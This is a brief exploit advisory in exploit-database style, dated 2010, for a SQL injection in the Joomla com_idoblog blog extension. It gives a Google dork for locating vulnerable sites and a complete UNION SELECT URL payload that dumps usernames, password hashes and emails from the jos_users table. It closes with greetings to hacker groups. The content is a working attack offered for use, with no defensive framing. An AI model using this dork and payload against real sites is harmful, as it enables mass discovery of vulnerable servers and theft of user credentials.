# Exploit Title: joomla com_idoblog /SQL injection Vulnerability # Google Dork: inurl:"com_idoblog" # Date: 25/12/2010 # Author: NOCKAR1111 # Location:Algeria # AuthorEmail:nockar1111@hotmail.com # Language: php # Tested on: windows xp sp3 en # http://extensions.joomla.org/extensions/news-production/blog/9218 #Exploit:http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- ____________________________________________ Greetz:Lagripe-dz,BrOx-Dz,Mr NoRvI,indoushka and dz4all members